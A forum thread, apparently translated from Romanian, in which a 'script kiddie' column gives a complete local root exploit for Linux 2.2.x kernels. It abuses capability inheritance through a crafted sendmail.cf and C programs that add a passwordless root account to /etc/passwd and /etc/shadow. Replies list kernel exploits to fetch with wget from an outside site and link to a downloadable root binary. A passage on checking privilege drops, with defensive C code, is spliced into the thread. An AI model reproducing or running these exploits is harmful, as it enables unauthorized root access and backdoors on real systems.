zbeng Posted May 28, 2006

Starting with this issue, I thought I'd set up a column for "script kiddies", for no other reason than that I'm a very lazy guy, and I remember that in times not long gone I was hooked on easy-to-use programs that would give me root in no more than 10 minutes on various Linux boxes. And since among the magazine's readers there are surely some who want that... Recently it was discovered that kernels 2.2.x have a big problem, and it is precisely this problem that we'll discuss today.

The "capabilities" required by one of the POSIX standards were recently implemented in the Linux kernel. More precisely, from 2.2 onward. These "capabilities" are in fact a new way of controlling privileges, which state more specifically what privileged processes may do (I don't want to be too mean to the magazine's readers, but you do know what processes are, right?).

The problem with these capabilities is that they are inherited from the parent process by the child process exactly as they are. And now the method of exploitation: if we set all the capabilities to 0 (that is, the least privileged mode possible), a program such as sendmail, which tries to setgid and setuid before doing things that could harm the system if run as root, will no longer manage to do so, and will keep running as root. And if you have a program that runs as root and does whatever you want, is there any problem controlling that machine? I think not.

Good. And since the column is called "sKript Kiddo", let's now see the script that makes the whole story work properly. But don't rush. First let me explain what I want to do. First of all I intend to play at being sendmail. That is, to use sendmail as a lockpick into the system. And as you know, sendmail has a configuration file called sendmail.cf. Well, I don't like that file, so I'm going to write another one.
Then I intend to make a little program that blows up sendmail's privileges, so that sendmail can no longer setuid and setgid, and then the sendmail.cf written by me will tell sendmail to run a program that will write a new line into /etc/passwd and /etc/shadow, which will give me a root account.

So. Copy everything that follows into a file which you will name sendmail.cf. At the end of the file, about the 15th line from top to bottom, there is a commented line. Follow its instructions.

--- Cut Here (sendmail.cf) --
V8/Berkeley
Cwlocalhost
Fw/etc/sendmail.cw
DSlocalhost
CO @ % !
C..
C[[
Kaccess hash -o /etc/mail/access
FR-o /etc/mail/relay-domains
Kdequote dequote
CE root
DnMAILER-DAEMON
CPREDIRECT
DZ8.9.3
O SevenBitInput=False
O EightBitMode=pass8
O AliasWait=10
O AliasFile=/etc/aliases
O MinFreeBlocks=100
O BlankSub=.
O HoldExpensive=False
O DeliveryMode=background
O AutoRebuildAliases=True
O TempFileMode=0600
O HelpFile=/usr/lib/sendmail.hf
O SendMimeErrors=True
O ForwardPath=$z/.forward.$w:$z/.forward
O ConnectionCacheSize=2
O ConnectionCacheTimeout=5m
O UseErrorsTo=False
O LogLevel=9
O CheckAliases=False
O OldStyleHeaders=True
O PrivacyOptions=authwarnings
O QueueDirectory=/tmp
O Timeout.connect=1m
O Timeout.queuereturn=5d
O Timeout.queuewarn=4h
O SuperSafe=True
O StatusFile=/var/log/sendmail.st
O DefaultUser=8:12
O TryNullMXList=true
O RefuseLA=12
O MaxDaemonChildren=20
O ConnectionRateThrottle=1
O HostsFile=/etc/hosts
O SmtpGreetingMessage=$j Sendmail $v/$Z; $b
O UnixFromLine=From $g $d
O OperatorChars=.:%@!^/[]+
O DontProbeInterfaces=true
Pfirst-class=0
Pspecial-delivery=100
Plist=-30
Pbulk=-60
Pjunk=-100
Troot
Tdaemon
Tuucp
H?P?Return-Path: <$g>
HReceived: $?sfrom $s $.$?_($?s$|from $.$_)
	$.by $j ($v/$Z)$?r with $r$.
	id $i$?ufor $u; $|;$.$b
H?D?Resent-Date: $a
H?D?Date: $a
H?F?Resent-From: $?x$x <$g>$|$g$.
H?F?From: $?x$x <$g>$|$g$.
H?x?Full-Name: $x
H?M?Resent-Message-Id: <$t.$i@$j>
H?M?Message-Id: <$t.$i@$j>

S3
R$@	$@ <@>
R$*	$: $1 <@>	mark addresses
R$* < $* > $* <@>	$: $1 < $2 > $3	unmark <addr>
R@ $* <@>	$: @ $1	unmark @host:...
R$* :: $* <@>	$: $1 :: $2	unmark node::addr
R:include: $* <@>	$: :include: $1	unmark :include:...
R$* [ $* : $* ] <@>	$: $1 [ $2 : $3 ]	unmark IPv6 addrs
R$* : $* [ $* ]	$: $1 : $2 [ $3 ] <@>	remark if leading colon
R$* : $* <@>	$: $2	strip colon if marked
R$* <@>	$: $1	unmark
R$* ;	$1	strip trailing semi
R$* < $* ; >	$1 < $2 >	bogus bracketed semi
R$@	$@ :; <@>
R$*	$: < $1 >	housekeeping <>
R$+ < $* >	< $2 >	strip excess on left
R< $* > $+	< $1 >	strip excess on right
R<>	$@ < @ >	MAIL FROM:<> case
R< $+ >	$: $1	remove housekeeping <>
R@ $+ , $+	@ $1 : $2	change all "," to ":"
R@ $+ : $+	$@ $>96 < @$1 > : $2	handle <route-addr>
R $+ : $* ; @ $+	$@ $>96 $1 : $2 ; < @ $3 >	list syntax
R $+ : $* ;	$@ $1 : $2;	list syntax
R$+ @ $+	$: $1 < @ $2 >	focus on domain
R$+ < $+ @ $+ >	$1 $2 < @ $3 >	move gaze right
R$+ < @ $+ >	$@ $>96 $1 < @ $2 >	already canonical
R$* < @ $* : $* > $*	$1 < @ $2 $3 > $4	nix colons in addrs
R$- ! $+	$@ $>96 $2 < @ $1 .UUCP >	resolve uucp names
R$+ . $- ! $+	$@ $>96 $3 < @ $1 . $2 >	domain uucps
R$+ ! $+	$@ $>96 $2 < @ $1 .UUCP >	uucp subdomains
R$* % $*	$1 @ $2	First make them all @s.
R$* @ $* @ $*	$1 % $2 @ $3	Undo all but the last.
R$* @ $*	$@ $>96 $1 < @ $2 >	Insert < > and finish
R$*	$@ $>96 $1

S96
R$* < @ localhost > $*	$: $1 < @ $j . > $2	no domain at all
R$* < @ localhost . $m > $*	$: $1 < @ $j . > $2	local domain
R$* < @ localhost . UUCP > $*	$: $1 < @ $j . > $2	.UUCP domain
R$* < @ [ $+ ] > $*	$: $1 < @@ [ $2 ] > $3	mark [a.b.c.d]
R$* < @@ $=w > $*	$: $1 < @ $j . > $3	self-literal
R$* < @@ $+ > $*	$@ $1 < @ $2 > $3	canon IP addr
R$* < @ $+ . UUCP > $*	$: $1 < @ $[ $2 $] . UUCP . > $3
R$* < @ $+ . . UUCP . > $*	$@ $1 < @ $2 . > $3
R$* < @ $=w > $*	$: $1 < @ $2 . > $3
R$* < @ $j > $*	$: $1 < @ $j . > $2
R$* < @ $=M > $*	$: $1 < @ $2 . > $3
R$* < @ $* $=P > $*	$: $1 < @ $2 $3 . > $4
R$* < @ $* . . > $*	$1 < @ $2 . > $3

S4
R$* <@>	$@	handle <> and list:;
R$* < @ $+ . > $*	$1 < @ $2 > $3
R$* < @ *LOCAL* > $*	$1 < @ $j > $2
R$* < $+ > $*	$1 $2 $3	defocus
R@ $+ : @ $+ : $+	@ $1 , @ $2 : $3	<route-addr> canonical
R@ $*	$@ @ $1	... and exit
R$+ @ $- . UUCP	$2!$1	u@h.UUCP => h!u
R$+ % $=w @ $=w	$1 @ $2	u%host@host => u@host

S97
R$*	$: $>3 $1
R$*	$@ $>0 $1

S0
R$*	$: $>Parse0 $1	initial parsing
R<@>	$#local $: <@>	special case error msgs
R$*	$: $>98 $1	handle local hacks
R$*	$: $>Parse1 $1	final parsing

SParse0
R<@>	$@ <@>	special case error msgs
R$* : $* ; <@>	$#error $@ 5.1.3 $: "List:; syntax illegal for recipient addresses"
#R@ <@ $* >	< @ $1 >	catch "@@host" bogosity
R<@ $+>	$#error $@ 5.1.3 $: "User address required"
R$*	$: <> $1
R<> $* < @ [ $+ ] > $*	$1 < @ [ $2 ] > $3
R<> $* <$* : $* > $*	$#error $@ 5.1.3 $: "Colon illegal in host name part"
R<> $*	$1
R$* < @ . $* > $*	$#error $@ 5.1.2 $: "Invalid host name"
R$* < @ $* .. $* > $*	$#error $@ 5.1.2 $: "Invalid host name"
R$* < @ > $*	$@ $>Parse0 $>3 $1	user@ => user
R< @ $=w . > : $*	$@ $>Parse0 $>3 $2	@here:... -> ...
R$- < @ $=w . >	$: $(dequote $1 $) < @ $2 . >	dequote "foo"@here
R< @ $+ >	$#error $@ 5.1.3 $: "User address required"
R$* $=O $* < @ $=w . >	$@ $>Parse0 $>3 $1 $2 $3	...@here -> ...
R$-	$: $(dequote $1 $) < @ *LOCAL* >	dequote "foo"
R< @ *LOCAL* >	$#error $@ 5.1.3 $: "User address required"
R$* $=O $* < @ *LOCAL* >	$@ $>Parse0 $>3 $1 $2 $3	...@*LOCAL* -> ...
R$* < @ *LOCAL* >	$: $1

SParse1
R$* < @ [ $+ ] > $*	$: $>98 $1 < @ [ $2 ] > $3	numeric internet spec
R$* < @ [ $+ ] > $*	$#esmtp $@ [$2] $: $1 < @ [$2] > $3	still numeric: send
R$+ < @ $=w . >	$: < $(virtuser $1 @ $2 $@ $1 $: @ $) > $1 < @ $2 . >
R<@> $+ + $* < @ $* . >	$: < $(virtuser $1 + * @ $3 $@ $1 $: @ $) > $1 + $2 < @ $3 . >
R<@> $+ + $* < @ $* . >	$: < $(virtuser $1 @ $3 $@ $1 $: @ $) > $1 + $2 < @ $3 . >
R<@> $+ < @ $+ . >	$: < $(virtuser @ $2 $@ $1 $: @ $) > $1 < @ $2 . >
R<@> $+	$: $1
R< error : $- $+ > $*	$#error $@ $(dequote $1 $) $: $2
R< $+ > $+ < @ $+ >	$: $>97 $1
R$=L < @ $=w . >	$#local $: @ $1	special local names
R$+ < @ $=w . >	$#local $: $1	regular local name
R$* < @ $* > $*	$: $>95 < $S > $1 < @ $2 > $3	glue on smarthost name
R$* < @$* > $*	$#esmtp $@ $2 $: $1 < @ $2 > $3	user@host.domain
R$=L	$#local $: @ $1	special local names
R$+	$#local $: $1	regular local names

S5
R$+ + *	$#local $@ $&h $: $1
R$+ + $*	$#local $@ + $2 $: $1 + *
R$+	$: <> $1
R< > $+	$: < $H > $1	try hub
R< > $+	$: < $R > $1	try relay
R< > $+	$: < > < $1 $&h >	nope, restore +detail
R< > < $+ + $* > $*	< > < $1 > + $2 $3	find the user part
R< > < $+ > + $*	$#local $@ $2 $: @ $1	strip the extra +
R< > < $+ >	$@ $1	no +detail
R$+	$: $1 <> $&h	add +detail back in
R$+ <> + $*	$: $1 + $2	check whether +detail
R$+ <> $*	$: $1	else discard
R< local : $* > $*	$: $>95 < local : $1 > $2	no host extension
R< error : $* > $*	$: $>95 < error : $1 > $2	no host extension
R< $- : $+ > $+	$: $>95 < $1 : $2 > $3 < @ $2 >
R< $+ > $+	$@ $>95 < $1 > $2 < @ $1 >

S95
R< > $*	$@ $1	strip off null relay
R< error : $- $+ > $*	$#error $@ $(dequote $1 $) $: $2
R< local : $* > $*	$>CanonLocal < $1 > $2
R< $- : $+ @ $+ > $*<$*>$*	$# $1 $@ $3 $: $2<@$3>	use literal user
R< $- : $+ > $*	$# $1 $@ $2 $: $3	try qualified mailer
R< $=w > $*	$@ $2	delete local host
R< $+ > $*	$#relay $@ $1 $: $2	use unqualified mailer

SCanonLocal
R< $* > < @ $+ > : $+	$@ $>97 $3
R< $* > $+ $=O $+ < @ $+ >	$@ $>97 $2 $3 $4
R< $* > $* < @ $* . >	$: < $1 > $2 < @ $3 >
R< > $* < @ $* > $*	$#local $@ $1@$2 $: $1
R< > $+	$#local $@ $1 $: $1
R< $+ @ $+ > $* < @ $* >	$: < $1 > $3 < @ $4 >
R< $+ > $* <@ $* > $*	$#local $@ $2@$3 $: $1
R< $+ > $*	$#local $@ $2 $: $1

S93
R$=E < @ *LOCAL* >	$@ $1 < @ $j . >	leave exposed
R$=E < @ $=M . >	$@ $1 < @ $2 . >
R$=E < @ $=w . >	$@ $1 < @ $2 . >
R$* < @ $=M . > $*	$: $1 < @ $2 . @ $M > $3	convert masqueraded doms
R$* < @ $=w . > $*	$: $1 < @ $2 . @ $M > $3
R$* < @ *LOCAL* > $*	$: $1 < @ $j . @ $M > $2
R$* < @ $+ @ > $*	$: $1 < @ $2 > $3	$M is null
R$* < @ $+ @ $+ > $*	$: $1 < @ $3 . > $4	$M is not null

S94
R$* < @ *LOCAL* > $*	$: $1 < @ $j . > $2

S98
R wmail.$-	$# wmail $: $1
R wmail.$- < @ $=w . >	$# wmail $: $1
R wmail.$- < @ [ $=w ] . >	$# wmail $: $1
R wmail.$- < @ [ $+ ] . >	$# wmail $: $1
R$* < @ $+ .REDIRECT. >	$: $1 < @ $2 . REDIRECT . > < ${opMode} >
R$* < @ $+ .REDIRECT. >	$: $1 < @ $2 . REDIRECT. >
R$* < @ $+ .REDIRECT. > < $- >	$# error $@ 5.1.1 $: "551 User has moved; please try " <$1@$2>

SLookUpDomain
R<$+> <$+> <$*>	$: < $(access $1 $: ? $) > <$1> <$2> <$3>
R<?> <$+.$+> <$+> <$*>	$@ $>LookUpDomain <$2> <$3> <$4>
R<?> <$+> <$+> <$*>	$@ <$2> <$3>
R<$*> <$+> <$+> <$*>	$@ <$1> <$4>

SLookUpAddress
R<$+> <$+> <$*>	$: < $(access $1 $: ? $) > <$1> <$2> <$3>
R<?> <$+.$-> <$+> <$*>	$@ $>LookUpAddress <$1> <$3> <$4>
R<?> <$+> <$+> <$*>	$@ <$2> <$3>
R<$*> <$+> <$+> <$*>	$@ <$1> <$4>

SCanonAddr
R$*	$: $>Parse0 $>3 $1	make domain canonical
R< @ $+ > : $* @ $*	< @ $1 > : $2 % $3	change @ to % in src route
R$* < @ $+ > : $* : $*	$3 $1 < @ $2 > : $4	change to % hack.
R$* < @ $+ > : $*	$3 $1 < @ $2 >

SParseRecipient
R$*	$: <?> $>CanonAddr $1
R<?> $* < @ $* . >	<?> $1 < @ $2 >	strip trailing dots
R<?> $- < @ $* >	$: <?> $(dequote $1 $) < @ $2 >	dequote local part
R<?> $* $=O $* < @ $* >	$: <NO> $1 $2 $3 < @ $4>
R<?> $*	$@ $1
R<NO> $* < @ $* $=R >	$: <RELAY> $1 < @ $2 $3 >
R<NO> $* < @ $+ >	$: $>LookUpDomain <$2> <NO> <$1 < @ $2 >>
R<$+> <$+>	$: <$1> $2
R<RELAY> $* < @ $* >	$@ $>ParseRecipient $1
R<$-> $*	$@ $2

SLocal_check_relay
Scheck_relay
R$*	$: $1 $| $>"Local_check_relay" $1
R$* $| $* $| $#$*	$#$3
R$* $| $* $| $*	$@ $>"Basic_check_relay" $1 $| $2

SBasic_check_relay
R$*	$: < ${deliveryMode} > $1
R< d > $*	$@ deferred
R< $* > $*	$: $2
R$+ $| $+	$: $>LookUpDomain < $1 > <?> < $2 >
R<?> < $+ >	$: $>LookUpAddress < $1 > <?> < $1 >
R<?> < $+ >	$: $1
R<OK> < $* >	$@ OK
R<RELAY> < $* >	$@ RELAY
R<REJECT> $*	$#error $@ 5.7.1 $: "550 Access denied"
R<DISCARD> $*	$#discard $: discard
R<$+> $*	$#error $@ 5.7.1 $: $1

SLocal_check_mail
Scheck_mail
R$*	$: $1 $| $>"Local_check_mail" $1
R$* $| $#$*	$#$2
R$* $| $*	$@ $>"Basic_check_mail" $1

SBasic_check_mail
R$*	$: < ${deliveryMode} > $1
R< d > $*	$@ deferred
R< $* > $*	$: $2
R<>	$@ <OK>
R$*	$: <?> $>CanonAddr $1
R<?> $* < @ $+ . >	<?> $1 < @ $2 >	strip trailing dots
R<?> $* < $* $=P > $*	$: <OK> $1 < @ $2 $3 > $4
R<?> $* < @ $+ > $*	$: <OK> $1 < @ $2 > $3	... unresolvable OK
R<$+> $* < @localhost >	$: < ? $&{client_name} > <$1> $2 < @localhost >
R<$+> $* < @localhost.$m >	$: < ? $&{client_name} > <$1> $2 < @localhost.$m >
R<$+> $* < @localhost.UUCP >	$: < ? $&{client_name} > <$1> $2 < @localhost.UUCP >
R<? $=w> <$+> $*	<?> <$2> $3
R<? $+> <$+> $*	$#error $@ 5.5.4 $: "553 Real domain name required"
R<?> <$+> $*	$: <$1> $2
R<$+> $* < @ $+ > $*	$: <USER $(access $2@ $: ? $) > <$1> $2 < @ $3 > $4
R<USER ?> <$+> $* < @ $* > $*	$: <USER $(access $2@$3$4 $: ? $) > <$1> $2 < @ $3 > $4
R<USER ?> <$+> $+ < @ $+ > $*	$: <USER $(access $2@$3 $: ? $) > <$1> $2 < @ $3 > $4
R<USER ?> <$+> $* < @ $+ > $*	$: $>LookUpDomain <$3> <$1> <>
R<?> $*	$: <USER $(access $1@ $: ? $) > <?> $1
R<USER $+> <$+> $*	$: <$1> $3
R<?> $*	$: < ? $&{client_name} > $1
R<?> $*	$@ <OK>	...local unqualed ok
R<? $+> $*	$#error $@ 5.5.4 $: "553 Domain name required"	...remote is not
R<?> $*	$@ <OK>
R<OK> $*	$@ <OK>
R<TEMP> $*	$#error $@ 4.1.8 $: "451 Sender domain must resolve"
R<PERM> $*	$#error $@ 5.1.8 $: "501 Sender domain must exist"
R<RELAY> $*	$@ <RELAY>
R<DISCARD> $*	$#discard $: discard
R<REJECT> $*	$#error $@ 5.7.1 $: "550 Access denied"
R<$+> $*	$#error $@ 5.7.1 $: $1	error from access db

SLocal_check_rcpt
Scheck_rcpt
R$*	$: $1 $| $>"Local_check_rcpt" $1
R$* $| $#$*	$#$2
R$* $| $*	$@ $>"Basic_check_rcpt" $1

SBasic_check_rcpt
R$*	$: < ${deliveryMode} > $1
R< d > $*	$@ deferred
R< $* > $*	$: $2
R$*	$: $>ParseRecipient $1	strip relayable hosts
R$*	$: <?> $1
R<?> $+ < @ $=w >	$: <> <USER $1> <FULL $1@$2> <HOST $2> <$1 < @ $2 >>
R<?> $+ < @ $* >	$: <> <FULL $1@$2> <HOST $2> <$1 < @ $2 >>
R<?> $+	$: <> <USER $1> <$1>
R<> <USER $+> $*	$: <$(access $1 $: $)> $2
R<> <FULL $+> $*	$: <$(access $1 $: $)> $2
R<OK> <FULL $+> $*	$: <$(access $1 $: $)> $2
R<> <HOST $+> $*	$: <$(access $1 $: $)> $2
R<OK> <HOST $+> $*	$: <$(access $1 $: $)> $2
R<> <$*>	$: $1
R<OK> <$*>	$: $1
R<RELAY> <$*>	$: $1
R<REJECT> $*	$#error $@ 5.2.1 $: "550 Mailbox disabled for this recipient"
R<$+> $*	$#error $@ 5.2.1 $: $1	error from access db
R$+ < @ $=w >	$@ OK
R$+ < @ $* $=R >	$@ OK
R$+ < @ $* >	$: $>LookUpDomain <$2> <?> <$1 < @ $2 >>
R<RELAY> $*	$@ RELAY
R<$*> <$*>	$: $2
R$*	$: <?> $1
R<?> $* < @ $+ >	$: <REMOTE> $1 < @ $2 >
R<?> $+	$@ OK
R<$+> $*	$: $2
R$*	$: <?> $&{client_name}
R<?> [$+]	$: <BAD> [$1]
R<?> $* $~P	$: <?> $[ $1 $2 $]
R<$-> $*	$: $2
R$* .	$1	strip trailing dots
R$@	$@ OK
R$=w	$@ OK
R$* $=R	$@ OK
R$*	$: $>LookUpDomain <$1> <?> <$1>
R<RELAY> $*	$@ RELAY
R<$*> <$*>	$: $2
R$*	$: $&{client_addr}
R$@	$@ OK	originated locally
R0	$@ OK	originated locally
R$=R $*	$@ OK	relayable IP address
R$*	$: $>LookUpAddress <$1> <?> <$1>
R<RELAY> $*	$@ RELAY	relayable IP address
R<$*> <$*>	$: $2
R$*	$: [ $1 ]	put brackets around it...
R$=w	$@ OK	... and see if it is local
R$*	$#error $@ 5.7.1 $: "550 Relaying denied"

Mprocmail, P=/usr/bin/procmail, F=DFMSPhnu9, S=11/31, R=21/31, T=DNS/RFC822/X-Unix, A=procmail -Y -m $h $f $u
Msmtp, P=[IPC], F=mDFMuX, S=11/31, R=21, E=\r\n, L=990, T=DNS/RFC822/SMTP, A=IPC $h
Mesmtp, P=[IPC], F=mDFMuXa, S=11/31, R=21, E=\r\n, L=990, T=DNS/RFC822/SMTP, A=IPC $h
Msmtp8, P=[IPC], F=mDFMuX8, S=11/31, R=21, E=\r\n, L=990, T=DNS/RFC822/SMTP, A=IPC $h
Mrelay, P=[IPC], F=mDFMuXa8, S=11/31, R=61, E=\r\n, L=2040, T=DNS/RFC822/SMTP, A=IPC $h

S11
R$+	$: $>51 $1	sender/recipient common
R$* :; <@>	$@	list:; special case
R$*	$: $>61 $1	qualify unqual'ed names
R$+	$: $>94 $1	do masquerading

S21
R$+	$: $>51 $1	sender/recipient common
R$+	$: $>61 $1	qualify unqual'ed names

S31
R$+	$: $>51 $1	sender/recipient common
R:; <@>	$@	list:; special case
R$* <@> $*	$@ $1 <@> $2	pass null host through
R< @ $* > $*	$@ < @ $1 > $2	pass route-addr through
R$*	$: $>61 $1	qualify unqual'ed names
R$+	$: $>93 $1	do masquerading

S51
R< @ $+ > $*	$@ < @ $1 > $2	resolve <route-addr>
R$+ < @ $+ .UUCP. >	$: < $2 ! > $1	convert to UUCP form
R$+ < @ $* > $*	$@ $1 < @ $2 > $3	not UUCP form
R< $&h ! > $- ! $+	$@ $2 < @ $1 .UUCP. >
R< $&h ! > $-.$+ ! $+	$@ $3 < @ $1.$2 >
R< $&h ! > $+	$@ $1 < @ $&h .UUCP. >
R< $+ ! > $+	$: $1 ! $2 < @ $Y >	use UUCP_RELAY
R$+ < @ $+ : $+ >	$@ $1 < @ $3 >	strip mailer: part
R$+ < @ >	$: $1 < @ *LOCAL* >	if no UUCP_RELAY

S61
R$* < @ $* > $*	$@ $1 < @ $2 > $3	already fully qualified
R$+	$@ $1 < @ *LOCAL* >	add local qualification

S71
R$+	$: $>61 $1
R$+	$: $>93 $1

# on the next line replace the string /calea/spre with the current directory
# e.g. /home/user
Mlocal, P=/calea/spre/add, F=lsDFMAw5:/|@qSPfhn9, S=10/30, R=20/40, T=DNS/RFC822/X-Unix, A=add -Y -a $h -d $u
Mprog, P=/usr/sbin/smrsh, F=lsDFMoqeu9, S=10/30, R=20/40, D=$z:/, T=X-Unix, A=sh -c $u
Mwmail, P=/usr/local/wMail/wmail, F=lsD, S=10/30, R=20/40, D=/tmp/, T=X-Unix, A=/usr/local/wMail/wmail $u

S10
R<@>	$n	errors to mailer-daemon
R@ <@ $*>	$n	temporarily bypass Sun bogosity
R$+	$: $>50 $1	add local domain if needed
R$*	$: $>94 $1	do masquerading

S20
R$+ < @ $* >	$: $1	strip host part

S30
R<@>	$n	errors to mailer-daemon
R@ <@ $*>	$n	temporarily bypass Sun bogosity
R$+	$: $>50 $1	add local domain if needed
R$*	$: $>93 $1	do masquerading

S40
R$+	$: $>50 $1	add local domain if needed

S50
R$* < @ $* > $*	$@ $1 < @ $2 > $3	already fully qualified
R$+	$@ $1 < @ *LOCAL* >	add local qualification
--- Cut here (done) --

And finally the script:

--- CUT HERE ---
#!/bin/sh
#
# This script is adapted and modified from the programs that were
# published on the BUGTRAQ mailing list.
# Using it can cause damage and is generally against the law.
# Personally I recommend that you do not use it.
# I also recommend that you do not distribute it, although it is under
# the GPL licence.
echo creez fisierele sursa
cat <<gata1> ex.c
#include <linux/capability.h>
int main (void) {
cap_user_header_t header;
cap_user_data_t data;
header = malloc(8);
data = malloc(12);
header->pid = 0;
header->version = _LINUX_CAPABILITY_VERSION;
data->inheritable = data->effective = data->permitted = 0;
capset(header, data);
execlp("/usr/sbin/sendmail", "sendmail" ,"-t", "-C", "./sendmail.cf", NULL);
}
gata1
echo shi acuma cel de-al doilea
cat <<gata.2> add.c
#include <fcntl.h>
int main (void) {
int fd;
char string[250];
seteuid(0);
setegid(0);
setuid(0);
setgid(0);
system("chmod u+w /etc/shadow");
fd = open("/etc/passwd", O_APPEND|O_WRONLY);
strcpy(string, "shmekeru:@:0:0::/root:/bin/sh\n");
write(fd, string, strlen(string));
close(fd);
fd = open("/etc/shadow", O_APPEND|O_WRONLY);
strcpy(string, "shmekeru::11029:0:99999:7:::\n");
write(fd, string, strlen(string));
close(fd);
}
gata.2
echo compilez...
gcc -o add add.c
gcc -o ex ex.c
cat <<gata3> mailexp
From: spargatoru@foobar.com
To: root@localhost
Subject: foobar.
gata3
echo rulez xploitu
./ex < mailexp
echo shi acuma ashteptatzi un pic...
sleep 10
echo root access pentru dumneavoastra
echo daca nu exista ssh instalat in sistem incercati
echo su shmekeru
ssh -lshmekeru localhost
-- Cut here (done) --
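The failure the post relies on is a privilege drop that silently does not take effect: sendmail calls setgid()/setuid(), the call fails because the capability set was emptied, and the program carries on as root. From the defender's side the fix is old and general: check the return value of every privilege-dropping call and verify the resulting identity, aborting rather than continuing when the drop did not happen. The following C program is an added example written for this page, not code from the thread, from sendmail or from the BUGTRAQ postings the script mentions; the function names drop_privileges() and drop_to_current_user() are my own assumptions, and the program only ever drops to the identity it already has, so it is safe to run as any user.

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

/* Added example (not from the thread): drop to uid/gid and verify the drop.
 * Returns 0 only if the process now runs as uid/gid and, when it dropped
 * from root, cannot get root back. Returns -1 otherwise; the caller must
 * treat -1 as fatal instead of carrying on with whatever privilege it has. */
int drop_privileges(uid_t uid, gid_t gid)
{
    /* Group first: once the uid is unprivileged, setgid() could no longer
     * change the group. Both calls are checked; an unchecked failure here
     * is exactly the condition the post's trick produces. */
    if (setgid(gid) != 0)
        return -1;
    if (setuid(uid) != 0)
        return -1;

    /* Do not trust the return values alone: confirm real and effective
     * ids actually changed to what was requested. */
    if (getuid() != uid || geteuid() != uid ||
        getgid() != gid || getegid() != gid)
        return -1;

    /* If we dropped from root, a further setuid(0) must now fail.
     * If it succeeds, the saved uid was left as 0 and the drop is bogus. */
    if (uid != 0 && setuid(0) == 0)
        return -1;

    return 0;
}

/* The check a daemon would run at start-up before touching untrusted
 * input. Dropping to the identity we already hold is always permitted,
 * so this path works for a root and a non-root caller alike. */
int drop_to_current_user(void)
{
    return drop_privileges(getuid(), getgid());
}

int main(void)
{
    if (drop_to_current_user() != 0) {
        fprintf(stderr, "privilege drop failed; refusing to continue\n");
        return 1;
    }
    printf("running as uid=%u gid=%u with verified privilege drop\n",
           (unsigned)getuid(), (unsigned)getgid());
    return 0;
}
```

The order matters: the group is changed while the process is still privileged, the uid last, and the result is verified rather than assumed. A program that treated the -1 as "try again later" or ignored it would be in the same position sendmail was in on the 2.2.x kernels described above.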
Thunder Posted May 29, 2006

Yeah... nice... but I got a bit confused at the end.
DANG3R Posted May 30, 2006

I got lost there too. Can someone help me? I mean, be a bit more precise about where the script ends and what needs to be modified.
cigraphics Posted June 2, 2006

Could someone put the whole file on some upload host, so we don't have to sit and copy what's written there? Plus, smileys have appeared in it.
Storm4u Posted August 21, 2006

2.4.17
newlocal - wget www.parit.org/newlocal
kmod - wget www.parit.org/kmod

2.4.18
brk
newlocal
kmod
km.2

2.4.19
brk
newlocal
kmod

2.4.20
ptrace
kmod
brk

2.4.21
brk
ptrace
w00t

2.4.22
km.2
brk
ptrace

2.4.23
mremap_pte
w00t

2.4.24
mremap_pte
w00t
Uselib24
elf

2.4.27
Uselib24
w00t
elf
elflbl

2.6.2
mremap_pte
krad
pwned

2.6.5 to 10
krad
pwned
krad3

www.parit.org has lots of interesting "stuff".
Death Posted March 21, 2008

Considering that I'm no longer around here, I won't comment, but for 2.2.x and 2.0.x there are much, much more trivial exploits. Unfortunately I no longer have the source, but I'll leave the link where I put it: http://rapidshare.de/files/38887651/0.tgz.html . Unpack it, then run it several times in a row, like: ./0;./0;./0;./0;./0;./0; . It gets uid 0 on any kernel listed above, and even on some 2.4: 2.4.7, 2.4.10.